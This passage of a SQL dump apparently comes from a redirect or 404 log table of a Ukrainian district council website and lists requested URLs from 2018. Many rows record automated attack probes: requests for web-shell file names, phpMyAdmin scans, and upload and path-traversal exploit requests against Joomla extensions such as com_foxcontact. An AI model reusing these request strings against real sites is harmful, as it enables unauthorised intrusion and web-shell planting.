00:00:00',301),(31909,'http://malyn-rayrada.gov.ua/images/404.php',NULL,'http://site.ru','',3,0,'2018-05-08 07:06:59','0000-00-00 00:00:00',301),(31910,'http://malyn-rayrada.gov.ua/media/mod.php',NULL,'http://site.ru','',1,0,'2018-05-08 07:14:29','0000-00-00 00:00:00',301),(31911,'http://malyn-rayrada.gov.ua/components/com_foxcontact/d.php',NULL,'http://site.ru','',2,0,'2018-05-08 07:26:05','0000-00-00 00:00:00',301),(31912,'http://malyn-rayrada.gov.ua/network/popup-pomo.php',NULL,'http://site.ru','',1,0,'2018-05-08 07:38:33','0000-00-00 00:00:00',301),(31913,'http://malyn-rayrada.gov.ua/framework.php',NULL,'http://site.ru','',2,0,'2018-05-08 08:09:06','0000-00-00 00:00:00',301),(31914,'http://malyn-rayrada.gov.ua/modules/mod_login/mod_log.php',NULL,'http://site.ru','',1,0,'2018-05-08 08:15:55','0000-00-00 00:00:00',301),(31915,'http://malyn-rayrada.gov.ua/tmp/system_infos.php',NULL,'http://site.ru','',1,0,'2018-05-08 08:18:10','0000-00-00 00:00:00',301),(31916,'http://malyn-rayrada.gov.ua/cache/sok.php',NULL,'http://site.ru','',1,0,'2018-05-08 08:37:20','0000-00-00 00:00:00',301),(31917,'http://malyn-rayrada.gov.ua/language/en-gb/1.php',NULL,'http://site.ru','',1,0,'2018-05-08 10:24:51','0000-00-00 00:00:00',301),(31918,'http://malyn-rayrada.gov.ua/templates/6.php',NULL,'http://site.ru','',2,0,'2018-05-08 10:25:12','0000-00-00 00:00:00',301),(31919,'http://malyn-rayrada.gov.ua/logs/logs.php',NULL,'http://site.ru','',1,0,'2018-05-08 10:54:34','0000-00-00 00:00:00',301),(31920,'http://malyn-rayrada.gov.ua/manager/popup-pomo.php',NULL,'http://site.ru','',3,0,'2018-05-08 11:25:43','0000-00-00 00:00:00',301),(31921,'http://malyn-rayrada.gov.ua/libraries/phpmailer/language/popup-pomo.php',NULL,'http://site.ru','',2,0,'2018-05-08 11:28:52','0000-00-00 00:00:00',301),(31922,'http://malyn-rayrada.gov.ua/components/com_foxcontact/indoxploit_fistsb.php',NULL,'http://site.ru','',2,0,'2018-05-08 11:30:41','0000-00-00 00:00:00',301),(31923,'http://malyn-rayrada.gov.ua/yjh.php',NULL,'','',1,0,'2018-05-08 11:44:07','0000-00-00 00:00:00',301),(31924,'http://malyn-rayrada.gov.ua/templates/atomic/cutia.php',NULL,'http://site.ru','',1,0,'2018-05-08 11:53:08','0000-00-00 00:00:00',301),(31925,'http://malyn-rayrada.gov.ua/components/com_foxcontact/z.php',NULL,'http://site.ru','',2,0,'2018-05-08 12:16:25','0000-00-00 00:00:00',301),(31926,'http://malyn-rayrada.gov.ua/xattacker.php?x=attacker',NULL,'','',1,0,'2018-05-08 17:14:29','0000-00-00 00:00:00',301),(31927,'http://malyn-rayrada.gov.ua/language/lv-lv/lv-lv.localise2.php',NULL,'http://site.ru','',2,0,'2018-05-08 23:20:00','0000-00-00 00:00:00',301),(31928,'http://malyn-rayrada.gov.ua/db_z.php',NULL,'','',1,0,'2018-05-09 03:04:42','0000-00-00 00:00:00',301),(31929,'http://malyn-rayrada.gov.ua/11.php',NULL,'','',3,0,'2018-05-09 09:23:19','0000-00-00 00:00:00',301),(31930,'http://malyn-rayrada.gov.ua/beck/cron.php',NULL,'','',1,0,'2018-05-10 04:56:35','0000-00-00 00:00:00',301),(31931,'http://malyn-rayrada.gov.ua/prv8.php',NULL,'','',1,0,'2018-05-10 17:04:15','0000-00-00 00:00:00',301),(31932,'http://malyn-rayrada.gov.ua/temp.php',NULL,'','',1,0,'2018-05-11 05:53:01','0000-00-00 00:00:00',301),(31933,'http://malyn-rayrada.gov.ua/tmp/sfx.php',NULL,'','',1,0,'2018-05-11 18:02:38','0000-00-00 00:00:00',301),(31934,'http://malyn-rayrada.gov.ua/wp-caches.php',NULL,'','',1,0,'2018-05-12 12:13:23','0000-00-00 00:00:00',301),(31935,'http://malyn-rayrada.gov.ua/configss.php?check=1',NULL,'','',1,0,'2018-05-13 01:21:04','0000-00-00 00:00:00',301),(31936,'http://malyn-rayrada.gov.ua/forum/index.php',NULL,'http://malyn-rayrada.gov.ua/forum/index.php','',1,0,'2018-05-13 02:14:08','0000-00-00 00:00:00',301),(31937,'http://malyn-rayrada.gov.ua/phpmyadmin/',NULL,'','',2,0,'2018-05-13 03:06:51','0000-00-00 00:00:00',301),(31938,'http://malyn-rayrada.gov.ua/pma/',NULL,'','',1,0,'2018-05-13 03:06:52','0000-00-00 00:00:00',301),(31939,'http://malyn-rayrada.gov.ua/myadmin/',NULL,'','',1,0,'2018-05-13 03:06:55','0000-00-00 00:00:00',301),(31940,'http://malyn-rayrada.gov.ua/sql/',NULL,'','',1,0,'2018-05-13 03:06:55','0000-00-00 00:00:00',301),(31941,'http://malyn-rayrada.gov.ua/script.php',NULL,'','',1,0,'2018-05-13 07:38:09','0000-00-00 00:00:00',301),(31942,'http://malyn-rayrada.gov.ua/tmpe.php',NULL,'','',1,0,'2018-05-15 03:19:16','0000-00-00 00:00:00',301),(31943,'http://malyn-rayrada.gov.ua/smalls.php',NULL,'','',1,0,'2018-05-15 09:59:26','0000-00-00 00:00:00',301),(31944,'http://www.malyn-rayrada.gov.ua/roots.php',NULL,'','',5,0,'2018-05-16 04:44:43','0000-00-00 00:00:00',301),(31945,'http://malyn-rayrada.gov.ua/imdex.php',NULL,'','',1,0,'2018-05-16 10:49:36','0000-00-00 00:00:00',301),(31946,'http://malyn-rayrada.gov.ua/manager/index.php',NULL,'','',3,0,'2018-05-16 15:51:49','0000-00-00 00:00:00',301),(31947,'http://malyn-rayrada.gov.ua/hook-filters.php',NULL,'','',1,0,'2018-05-16 17:48:03','0000-00-00 00:00:00',301),(31948,'http://malyn-rayrada.gov.ua/gtde.php',NULL,'','',1,0,'2018-05-18 07:39:35','0000-00-00 00:00:00',301),(31949,'http://www.malyn-rayrada.gov.ua/web-cache.php',NULL,'','',4,0,'2018-05-18 08:54:35','0000-00-00 00:00:00',301),(31950,'http://malyn-rayrada.gov.ua/lieats.php',NULL,'','',1,0,'2018-05-18 14:48:16','0000-00-00 00:00:00',301),(31951,'http://malyn-rayrada.gov.ua/backup.bak.php',NULL,'','',1,0,'2018-05-19 05:31:14','0000-00-00 00:00:00',301),(31952,'http://malyn-rayrada.gov.ua/;http://malyn-rayrada.gov.ua/',NULL,'','',1,0,'2018-05-19 15:18:22','0000-00-00 00:00:00',301),(31953,'http://malyn-rayrada.gov.ua/ghfhvvaw.php',NULL,'','',1,0,'2018-05-19 19:56:58','0000-00-00 00:00:00',301),(31954,'http://malyn-rayrada.gov.ua/wp-cache.php',NULL,'','',2,0,'2018-05-20 15:24:57','0000-00-00 00:00:00',301),(31955,'http://www.malyn-rayrada.gov.ua/admin/index.php',NULL,'','',2,0,'2018-05-21 02:12:23','0000-00-00 00:00:00',301),(31956,'http://malyn-rayrada.gov.ua/wpcache.php?_=1',NULL,'','',1,0,'2018-05-21 06:27:24','0000-00-00 00:00:00',301),(31957,'http://www.malyn-rayrada.gov.ua/lieats.php',NULL,'','',1,0,'2018-05-21 15:53:21','0000-00-00 00:00:00',301),(31958,'http://malyn-rayrada.gov.ua/rsau.php',NULL,'','',1,0,'2018-05-21 17:09:02','0000-00-00 00:00:00',301),(31959,'http://malyn-rayrada.gov.ua/xmirpc.php?u=1',NULL,'','',1,0,'2018-05-21 22:47:48','0000-00-00 00:00:00',301),(31960,'http://www.malyn-rayrada.gov.ua/modules/­simpleslideshow/­uploadimage.php',NULL,'http://www.malyn-rayrada.gov.ua/modules/','',1,0,'2018-05-22 17:22:09','0000-00-00 00:00:00',301),(31961,'http://malyn-rayrada.gov.ua/axmlprc.php',NULL,'','',1,0,'2018-05-22 17:54:27','0000-00-00 00:00:00',301),(31962,'http://malyn-rayrada.gov.ua/indes.php',NULL,'','',1,0,'2018-05-23 03:48:06','0000-00-00 00:00:00',301),(31963,'http://malyn-rayrada.gov.ua/downloader/',NULL,'','',4,0,'2018-05-23 07:06:50','0000-00-00 00:00:00',301),(31964,'http://malyn-rayrada.gov.ua/path4.php?testwrite1=1',NULL,'','',1,0,'2018-05-23 16:21:25','0000-00-00 00:00:00',301),(31965,'http://www.malyn-rayrada.gov.ua/wp-post.php',NULL,'','',1,0,'2018-05-23 17:35:28','0000-00-00 00:00:00',301),(31966,'http://malyn-rayrada.gov.ua/wp-conde.php',NULL,'','',1,0,'2018-05-24 03:29:42','0000-00-00 00:00:00',301),(31967,'http://www.malyn-rayrada.gov.ua/joomla/',NULL,'','',2,0,'2018-05-24 09:52:52','0000-00-00 00:00:00',301),(31968,'http://www.malyn-rayrada.gov.ua/priv.php',NULL,'','',3,0,'2018-05-24 09:52:54','0000-00-00 00:00:00',301),(31969,'http://www.malyn-rayrada.gov.ua/components/com_oziogallery/imagin/scripts_ralcr/filesystem/writetofile.php',NULL,'','',1,0,'2018-05-24 09:52:55','0000-00-00 00:00:00',301),(31970,'http://www.malyn-rayrada.gov.ua/media/priv.php',NULL,'','',1,0,'2018-05-24 09:52:58','0000-00-00 00:00:00',301),(31971,'http://www.malyn-rayrada.gov.ua/components/com_jbcatalog/libraries/jsupload/server/php',NULL,'','',1,0,'2018-05-24 09:52:59','0000-00-00 00:00:00',301),(31972,'http://www.malyn-rayrada.gov.ua/components/com_jbcatalog/libraries/jsupload/server/php/files/priv.php',NULL,'','',1,0,'2018-05-24 09:53:00','0000-00-00 00:00:00',301),(31973,'http://www.malyn-rayrada.gov.ua/modules/mod_socialpinboard_menu/saveimagefromupload.php',NULL,'','',1,0,'2018-05-24 09:53:00','0000-00-00 00:00:00',301),(31974,'http://www.malyn-rayrada.gov.ua/modules/mod_socialpinboard_menu/images/socialpinboard/temp/				<li><a href=\"/index.php',NULL,'','',1,0,'2018-05-24 09:53:01','0000-00-00 00:00:00',301),(31975,'http://www.malyn-rayrada.gov.ua/components/com_foxcontact/lib/file-uploader.php?cid={}&mid={}&qqfile=/../../_func.php',NULL,'','',1,0,'2018-05-24 09:53:01','0000-00-00 00:00:00',301),(31976,'http://www.malyn-rayrada.gov.ua/components/com_foxcontact/lib/uploader.php?cid={}&mid={}&qqfile=/../../_func.php',NULL,'','',1,0,'2018-05-24 09:53:03','0000-00-00 00:00:00',301),(31977,'http://www.malyn-rayrada.gov.ua/components/com_foxcontact/_func.php.php',NULL,'','',1,0,'2018-05-24 09:53:04','0000-00-00 00:00:00',301),(31978,'http://www.malyn-rayrada.gov.ua//kontakty',NULL,'','',1,0,'2018-05-24 09:53:04','0000-00-00 00:00:00',301),(31979,'http://www.malyn-rayrada.gov.ua/kontakty.html',NULL,'','',1,0,'2018-05-24 09:53:05','0000-00-00 00:00:00',301),(31980,'http://www.malyn-rayrada.gov.ua/contatti.html',NULL,'','',1,0,'2018-05-24 09:53:05','0000-00-00 00:00:00',301),(31981,'http://www.malyn-rayrada.gov.ua//index.php/kontakty',NULL,'','',1,0,'2018-05-24 09:53:06','0000-00-00 00:00:00',301),(31982,'http://www.malyn-rayrada.gov.ua//contact',NULL,'','',1,0,'2018-05-24 09:53:06','0000-00-00 00:00:00',301),(31983,'http://www.malyn-rayrada.gov.ua/contacto',NULL,'','',2,0,'2018-05-24 09:53:07','0000-00-00 00:00:00',301),(31984,'http://www.malyn-rayrada.gov.ua//index.php/contato.html',NULL,'','',1,0,'2018-05-24 09:53:07','0000-00-00 00:00:00',301),(31985,'http://www.malyn-rayrada.gov.ua/en/contact',NULL,'','',1,0,'2018-05-24 09:53:07','0000-00-00 00:00:00',301),(31986,'http://www.malyn-rayrada.gov.ua/contactenos',NULL,'','',2,0,'2018-05-24 09:53:08','0000-00-00 00:00:00',301),(31987,'http://www.malyn-rayrada.gov.ua/tmp/plupload/priv.php',NULL,'','',1,0,'2018-05-24 09:53:09','0000-00-00 00:00:00',301),(31988,'http://www.malyn-rayrada.gov.ua/components/com_b2jcontact/izoc.php',NULL,'','',1,0,'2018-05-24 09:53:10','0000-00-00 00:00:00',301),(31989,'http://www.malyn-rayrada.gov.ua/com_sexycontactform/fileupload/index.php',NULL,'','',1,0,'2018-05-24 09:53:10','0000-00-00 00:00:00',301),(31990,'http://www.malyn-rayrada.gov.ua/com_sexycontactform/fileupload/files/priv.php',NULL,'','',1,0,'2018-05-24 09:53:11','0000-00-00 00:00:00',301),(31991,'http://www.malyn-rayrada.gov.ua/modules/mod_simplefileuploadv1.3/elements/priv.php',NULL,'','',2,0,'2018-05-24 09:53:13','0000-00-00 00:00:00',301),(31992,'http://www.malyn-rayrada.gov.ua/jwallpapers_files/plupload/priv.php',NULL,'','',1,0,'2018-05-24 09:53:15','0000-00-00 00:00:00',301),(31993,'http://www.malyn-rayrada.gov.ua/components/com_facileforms/libraries/jquery/uploadify.php',NULL,'','',1,0,'2018-05-24 09:53:19','0000-00-00 00:00:00',301),(31994,'http://www.malyn-rayrada.gov.ua/components/com_facileforms/libraries/jquery/priv.php',NULL,'','',1,0,'2018-05-24 09:53:19','0000-00-00 00:00:00',301),(31995,'http://www.malyn-rayrada.gov.ua/components/com_joomleague/assets/classes/open-flash-chart/ofc_upload_image.php?name=xxb.php',NULL,'','',1,0,'2018-05-24 09:53:22','0000-00-00 00:00:00',301),(31996,'http://www.malyn-rayrada.gov.ua/components/com_joomleague/assets/classes//tmp-upload-images/xxb.php',NULL,'','',1,0,'2018-05-24 09:53:22','0000-00-00 00:00:00',301),(31997,'http://malyn-rayrada.gov.ua/pols.php',NULL,'','',1,0,'2018-05-24 10:00:51','0000-00-00 00:00:00',301),(31998,'http://malyn-rayrada.gov.ua/user/password',NULL,'','',1,0,'2018-05-24 14:19:57','0000-00-00 00:00:00',301),(31999,'http://malyn-rayrada.gov.ua/random.php',NULL,'','',1,0,'2018-05-24 17:14:32','0000-00-00 00:00:00',301),(32000,'http://malyn-rayrada.gov.ua/webconfig.txt.php',NULL,'','',1,0,'2018-05-25 01:30:35','0000-00-00 00:00:00',301),(32001,'http://www.malyn-rayrada.gov.ua/include-sql.php',NULL,'','',1,0,'2018-05-25 02:59:04','0000-00-00 00:00:00',301),(32002,'http://www.malyn-rayrada.gov.ua/marvins.php',NULL,'','',1,0,'2018-05-26 14:09:20','0000-00-00 00:00:00',301),(32003,'http://malyn-rayrada.gov.ua/view.php?check=1',NULL,'','',1,0,'2018-05-27 11:17:11','0000-00-00 00:00:00',301),(32004,'http://www.malyn-rayrada.gov.ua/gtde.php',NULL,'','',1,0,'2018-05-27 20:45:59','0000-00-00 00:00:00',301),(32005,'http://malyn-rayrada.gov.ua/members/page2.html',NULL,'http://malyn-rayrada.gov.ua','',1,0,'2018-05-28 21:40:59','0000-00-00 00:00:00',301),(32006,'http://malyn-rayrada.gov.ua/user/register/',NULL,'','',7,0,'2018-05-29 07:38:36','0000-00-00 00:00:00',301),(32007,'http://malyn-rayrada.gov.ua/wp-cokd.php',NULL,'','',1,0,'2018-05-29 22:12:42','0000-00-00 00:00:00',301),(32008,'http://malyn-rayrada.gov.ua/sizing.php',NULL,'','',1,0,'2018-05-30 03:25:15','0000-00-00 00:00:00',301),(32009,'http://malyn-rayrada.gov.ua/configurationbak.php',NULL,'','',1,0,'2018-05-30 11:17:55','0000-00-00 00:00:00',301),(32010,'http://www.malyn-rayrada.gov.ua/user/register/',NULL,'','',4,0,'2018-05-31 00:08:46','0000-00-00 00:00:00',301),(32011,'http://www.malyn-rayrada.gov.ua/controller.php',NULL,'','',2,0,'2018-05-31 12:59:33','0000-00-00 00:00:00',301),(32012,'http://malyn-rayrada.gov.ua/camille.php',NULL,'','',1,0,'2018-05-31 22:40:50','0000-00-00 00:00:00',301),(32013,'http://malyn-rayrada.gov.ua/pinfon.php',NULL,'','',1,0,'2018-06-01 08:51:17','0000-00-00 00:00:00',301),(32014,'http://www.malyn-rayrada.gov.ua/wp-pols.php',NULL,'','',1,0,'2018-06-02 15:03:46','0000-00-00 00:00:00',301),(32015,'http://malyn-rayrada.gov.ua/iontrol.php',NULL,'','',1,0,'2018-06-03 03:24:30','0000-00-00 00:00:00',301),(32016,'http://malyn-rayrada.gov.ua/sqlibak.php',NULL,'','',1,0,'2018-06-03 22:05:46','0000-00-00 00:00:00',301),(32017,'http://www.malyn-rayrada.gov.ua/tmp.php',NULL,'','',1,0,'2018-06-04 09:04:20','0000-00-00 00:00:00',301),(32018,'http://malyn-rayrada.gov.ua/reade.php',NULL,'','',1,0,'2018-06-05 12:48:48','0000-00-00 00:00:00',301),(32019,'http://malyn-rayrada.gov.ua/keith.php',NULL,'','',1,0,'2018-06-06 05:11:29','0000-00-00 00:00:00',301),(32020,'http://malyn-rayrada.gov.ua/includes.php',NULL,'','',1,0,'2018-06-06 11:49:21','0000-00-00 00:00:00',301),(32021,'http://malyn-rayrada.gov.ua/kup.php?u=1',NULL,'','',1,0,'2018-06-06 18:05:45','0000-00-00 00:00:00',301),(32022,'http://malyn-rayrada.gov.ua/templates/protostar/js/templatedetails.php',NULL,'','',1,0,'2018-06-07 01:00:39','0000-00-00 00:00:00',301),(32023,'http://www.malyn-rayrada.gov.ua/contact',NULL,'','',1,0,'2018-06-07 02:19:06','0000-00-00 00:00:00',301),(32024,'http://www.malyn-rayrada.gov.ua/contactus',NULL,'','',1,0,'2018-06-07 02:19:06','0000-00-00 00:00:00',301),(32025,'http://www.malyn-rayrada.gov.ua/contact-us',NULL,'','',1,0,'2018-06-07 02:19:06','0000-00-00 00:00:00',301),(32026,'http://www.malyn-rayrada.gov.ua/kontakt',NULL,'','',1,0,'2018-06-07 02:19:06','0000-00-00 00:00:00',301),(32027,'http://www.malyn-rayrada.gov.ua/kontakty',NULL,'','',1,0,'2018-06-07 02:19:07','0000-00-00 00:00:00',301),(32028,'http://www.malyn-rayrada.gov.ua/contactar',NULL,'','',1,0,'2018-06-07 02:19:07','0000-00-00 00:00:00',301),(32029,'http://www.malyn-rayrada.gov.ua/iletisim',NULL,'','',1,0,'2018-06-07 02:19:07','0000-00-00 00:00:00',301),(32030,'http://www.malyn-rayrada.gov.ua/contatti',NULL,'','',1,0,'2018-06-07 02:19:07','0000-00-00 00:00:00',301),(32031,'http://www.malyn-rayrada.gov.ua/contato',NULL,'','',1,0,'2018-06-07 02:19:08','0000-00-00 00:00:00',301),(32032,'http://www.malyn-rayrada.gov.ua/contacts',NULL,'','',1,0,'2018-06-07 02:19:08','0000-00-00 00:00:00',301),(32033,'http://www.malyn-rayrada.gov.ua/contactos',NULL,'','',1,0,'2018-06-07 02:19:08','0000-00-00 00:00:00',301),(32034,'http://www.malyn-rayrada.gov.ua/index.php/contact',NULL,'','',1,0,'2018-06-07 02:19:08','0000-00-00 00:00:00',301),(32035,'http://www.malyn-rayrada.gov.ua/index.php/contactus',NULL,'','',1,0,'2018-06-07 02:19:09','0000-00-00 00:00:00',301),(32036,'http://www.malyn-rayrada.gov.ua/index.php/contact-us',NULL,'','',1,0,'2018-06-07 02:19:09','0000-00-00 00:00:00',301),(32037,'http://www.malyn-rayrada.gov.ua/index.php/kontakt',NULL,'','',1,0,'2018-06-07 02:19:09','0000-00-00 00:00:00',301),(32038,'http://www.malyn-rayrada.gov.ua/index.php/contacto',NULL,'','',1,0,'2018-06-07 02:19:09','0000-00-00 00:00:00',301),(32039,'http://www.malyn-rayrada.gov.ua/index.php/iletisim',NULL,'','',1,0,'2018-06-07 02:19:09','0000-00-00 00:00:00',301),(32040,'http://www.malyn-rayrada.gov.ua/index.php/kontakty',NULL,'','',1,0,'2018-06-07 02:19:10','0000-00-00 00:00:00',301),(32041,'http://www.malyn-rayrada.gov.ua/index.php/contatti',NULL,'','',1,0,'2018-06-07 02:19:10','0000-00-00 00:00:00',301),(32042,'http://www.malyn-rayrada.gov.ua/index.php/contactar',NULL,'','',1,0,'2018-06-07 02:19:10','0000-00-00 00:00:00',301),(32043,'http://www.malyn-rayrada.gov.ua/index.php/contato',NULL,'','',1,0,'2018-06-07 02:19:10','0000-00-00 00:00:00',301),(32044,'http://www.malyn-rayrada.gov.ua/index.php/contactenos',NULL,'','',1,0,'2018-06-07 02:19:10','0000-00-00 00:00:00',301),(32045,'http://www.malyn-rayrada.gov.ua/index.php/contacts',NULL,'','',1,0,'2018-06-07 02:19:11','0000-00-00 00:00:00',301),(32046,'http://www.malyn-rayrada.gov.ua/index.php/contactos',NULL,'','',1,0,'2018-06-07 02:19:11','0000-00-00 00:00:00',301),(32047,'http://malyn-rayrada.gov.ua/upgrade.php',NULL,'','',1,0,'2018-06-07 05:10:37','0000-00-00 00:00:00',301),(32048,'http://malyn-rayrada.gov.ua/maill.php',NULL,'','',1,0,'2018-06-08 02:00:53','0000-00-00 00:00:00',301),(32049,'http://malyn-rayrada.gov.ua/wp_honor.php',NULL,'','',1,0,'2018-06-08 14:43:32','0000-00-00 00:00:00',301),(32050,'http://www.malyn-rayrada.gov.ua/overlay.php',NULL,'','',1,0,'2018-06-08 17:02:31','0000-00-00 00:00:00',301),(32051,'http://malyn-rayrada.gov.ua/trackback.php',NULL,'','',1,0,'2018-06-08 18:08:40','0000-00-00 00:00:00',301),(32052,'http://malyn-rayrada.gov.ua/modules/mod_feed/tmpl/mod_feed.php?ms-load=yjk5hg',NULL,'','',2,0,'2018-06-08 23:54:50','0000-00-00 00:00:00',301),(32053,'http://malyn-rayrada.gov.ua/martina.php',NULL,'','',1,0,'2018-06-09 01:13:50','0000-00-00 00:00:00',301),(32054,'http://malyn-rayrada.gov.ua/rnnvhs.php',NULL,'','',1,0,'2018-06-09 08:21:57','0000-00-00 00:00:00',301),(32055,'http://malyn-rayrada.gov.ua/tobey.php',NULL,'','',1,0,'2018-06-09 19:59:40','0000-00-00 00:00:00',301),(32056,'http://www.malyn-rayrada.gov.ua/11.php',NULL,'','',1,0,'2018-06-10 14:18:59','0000-00-00 00:00:00',301),(32057,'http://www.malyn-rayrada.gov.ua/upgrade-network.php',NULL,'','',2,0,'2018-06-10 22:35:26','0000-00-00 00:00:00',301),(32058,'http://www.malyn-rayrada.gov.ua/layouts/modules.php',NULL,'','',1,0,'2018-06-11 08:56:52','0000-00-00 00:00:00',301),(32059,'http://www.malyn-rayrada.gov.ua/plugins/modules.php',NULL,'','',1,0,'2018-06-12 21:34:55','0000-00-00 00:00:00',301),(32060,'http://www.malyn-rayrada.gov.ua/wp-datas.php',NULL,'','',1,0,'2018-06-13 12:37:55','0000-00-00 00:00:00',301),(32061,'http://www.malyn-rayrada.gov.ua/xmlrpz-sql.php',NULL,'','',1,0,'2018-06-14 14:00:42','0000-00-00 00:00:00',301),(32062,'http://www.malyn-rayrada.gov.ua/config.php',NULL,'','',6,0,'2018-06-15 06:57:12','0000-00-00 00:00:00',301),(32063,'http://www.malyn-rayrada.gov.ua/configbak.php',NULL,'','',1,0,'2018-06-16 01:34:05','0000-00-00 00:00:00',301),(32064,'http://www.malyn-rayrada.gov.ua/imdex.php',NULL,'','',1,0,'2018-06-16 20:14:20','0000-00-00 00:00:00',301),(32065,'http://www.malyn-rayrada.gov.ua/redirect.php',NULL,'','',1,0,'2018-06-17 14:41:12','0000-00-00 00:00:00',301),(32066,'http://www.malyn-rayrada.gov.ua/wp-installation.php',NULL,'','',1,0,'2018-06-18 09:00:23','0000-00-00 00:00:00',301),(32067,'http://www.malyn-rayrada.gov.ua/hxcdm/cdm/hxcdm.php',NULL,'','',1,0,'2018-06-19 08:24:57','0000-00-00 00:00:00',301),(32068,'http://malyn-rayrada.gov.ua/index.php/2024-p-l-a-n-grafik-provedennya-zasidan-postijnikh-komisij-malinskoji-rajonnoji-radi-po-rozglyadu-pitan-yaki-vinosyatsya-na-24-sesiyu-rajonnoji-radi-7-sklikannya',NULL,'','',31,0,'2018-06-20 21:27:58','0000-00-00 00:00:00',301),(32069,'http://malyn-rayrada.gov.ua/anonsi/11563/plan-zahodiv-na-vihidni-02-po-03-chervnya-2018-roku/',NULL,'','',1,0,'2018-06-21 15:54:24','0000-00-00 00:00:00',301),(32070,'http://malyn-rayrada.gov.ua/login',NULL,'','',2,0,'2018-06-21 15:54:26','0000-00-00 00:00:00',301),(32071,'http://malyn-rayrada.gov.ua/poll/list',NULL,'','',1,0,'2018-06-21 15:54:27','0000-00-00 00:00:00',301),(32072,'http://malyn-rayrada.gov.ua/profile',NULL,'','',1,0,'2018-06-21 15:54:29','0000-00-00 00:00:00',301),(32073,'http://malyn-rayrada.gov.ua/prozora/zakupivli/protokoli-ocnki/',NULL,'','',1,0,'2018-06-21 15:54:30','0000-00-00 00:00:00',301),(32074,'http://malyn-rayrada.gov.ua/prozora/zakupivli/protokoli-rozkrittya/',NULL,'','',1,0,'2018-06-21 15:54:31','0000-00-00 00:00:00',301),(32075,'http://malyn-rayrada.gov.ua/prozora/zakupivli/rchn-plani-zakupvel/',NULL,'','',1,0,'2018-06-21 15:54:33','0000-00-00 00:00:00',301),(32076,'http://malyn-rayrada.gov.ua/prozora/zakupivli/rezultati/',NULL,'','',1,0,'2018-06-21 15:54:34','0000-00-00 00:00:00',301),(32077,'http://malyn-rayrada.gov.ua/prozora/zakupivli/zvti/',NULL,'','',1,0,'2018-06-21 15:54:36','0000-00-00 00:00:00',301),(32078,'http://malyn-rayrada.gov.ua/sitemap',NULL,'','',1,0,'2018-06-21 15:54:38','0000-00-00 00:00:00',301),(32079,'http://malyn-rayrada.gov.ua/slayder/11450/rozpochato-priyom-proektnih-propoziciy-dlya-uchasti-u-gromadskomu-proekti-byudzhet-uchasti-mista-chornomorska/',NULL,'','',1,0,'2018-06-21 15:54:39','0000-00-00 00:00:00',301),(32080,'http://malyn-rayrada.gov.ua/slayder/11519/chornomorsk-svyatkuye-45-richchya/',NULL,'','',1,0,'2018-06-21 15:54:41','0000-00-00 00:00:00',301),(32081,'http://malyn-rayrada.gov.ua/vlada/',NULL,'','',1,0,'2018-06-21 15:54:42','0000-00-00 00:00:00',301),(32082,'http://malyn-rayrada.gov.ua/vlada/golova/',NULL,'','',1,0,'2018-06-21 15:54:44','0000-00-00 00:00:00',301),(32083,'http://malyn-rayrada.gov.ua/vlada/golova/roboch-plani/',NULL,'','',1,0,'2018-06-21 15:54:45','0000-00-00 00:00:00',301),(32084,'http://malyn-rayrada.gov.ua/vlada/golova/zvernennya/',NULL,'','',1,0,'2018-06-21 15:54:47','0000-00-00 00:00:00',301),(32085,'http://malyn-rayrada.gov.ua/vlada/golova/zviti/',NULL,'','',1,0,'2018-06-21 15:54:49','0000-00-00 00:00:00',301),(32086,'http://malyn-rayrada.gov.ua/vlada/komunalni/',NULL,'','',1,0,'2018-06-21 15:54:50','0000-00-00 00:00:00',301),(32087,'http://malyn-rayrada.gov.ua/vlada/komunalni/chornomorske-upravlnnya-pat-odesagaz/',NULL,'','',1,0,'2018-06-21 15:54:53','0000-00-00 00:00:00',301),(32088,'http://malyn-rayrada.gov.ua/vlada/komunalni/kp-byuro-tehnchno-nventarizac/',NULL,'','',1,0,'2018-06-21 15:54:54','0000-00-00 00:00:00',301),(32089,'http://malyn-rayrada.gov.ua/vlada/komunalni/kp-frma-rayduga/',NULL,'','',1,0,'2018-06-21 15:54:56','0000-00-00 00:00:00',301),(32090,'http://malyn-rayrada.gov.ua/vlada/komunalni/kp-zelengosp/',NULL,'','',1,0,'2018-06-21 15:54:57','0000-00-00 00:00:00',301),(32091,'http://malyn-rayrada.gov.ua/anonsi/11583/plan-zahodiv-na-vihidni-3-09-po-10-chervnya-2018-roku/',NULL,'','',1,0,'2018-06-21 17:28:51','0000-00-00 00:00:00',301),(32092,'http://malyn-rayrada.gov.ua/anonsi/11595/plan-zahodiv-na-vihidni-z-16-po-17-chervnya-2018-roku/',NULL,'','',1,0,'2018-06-21 17:28:55','0000-00-00 00:00:00',301),(32093,'http://malyn-rayrada.gov.ua/anonsi/11600/shanovni-chornomorci/',NULL,'','',1,0,'2018-06-21 17:28:58','0000-00-00 00:00:00',301),(32094,'http://malyn-rayrada.gov.ua/anonsi/11601/do-uvagi-kerivnikiv-pidpriyemstv-ustanov-i-organizaciy/',NULL,'','',1,0,'2018-06-21 17:29:01','0000-00-00 00:00:00',301),(32095,'http://malyn-rayrada.gov.ua/anonsi/11612/plan-zahodiv-na-23-06-2018-24-06-2018-roku/',NULL,'','',1,0,'2018-06-21 17:29:06','0000-00-00 00:00:00',301),(32096,'http://malyn-rayrada.gov.ua/gromadyanam/',NULL,'','',1,0,'2018-06-21 17:29:11','0000-00-00 00:00:00',301),(32097,'http://malyn-rayrada.gov.ua/gromadyanam/ato/',NULL,'','',1,0,'2018-06-21 17:29:15','0000-00-00 00:00:00',301),(32098,'http://malyn-rayrada.gov.ua/gromadyanam/ato/novini/',NULL,'','',1,0,'2018-06-21 17:29:18','0000-00-00 00:00:00',301),(32099,'http://malyn-rayrada.gov.ua/gromadyanam/cnap/',NULL,'','',1,0,'2018-06-21 17:29:21','0000-00-00 00:00:00',301),(32100,'http://malyn-rayrada.gov.ua/gromadyanam/cnap/dokumenti-dozvlnogo-harakteru/',NULL,'','',1,0,'2018-06-21 17:29:24','0000-00-00 00:00:00',301),(32101,'http://malyn-rayrada.gov.ua/gromadyanam/cnap/elektronn-poslugi/',NULL,'','',1,0,'2018-06-21 17:29:28','0000-00-00 00:00:00',301),(32102,'http://malyn-rayrada.gov.ua/gromadyanam/cnap/normativno-pravova-baza/',NULL,'','',1,0,'2018-06-21 17:29:32','0000-00-00 00:00:00',301),(32103,'http://malyn-rayrada.gov.ua/gromadyanam/cnap/novini/',NULL,'','',1,0,'2018-06-21 17:29:36','0000-00-00 00:00:00',301),(32104,'http://malyn-rayrada.gov.ua/gromadyanam/cnap/novini/11610/otrimannya-konsultaciji-telefon/',NULL,'','',1,0,'2018-06-21 17:29:39','0000-00-00 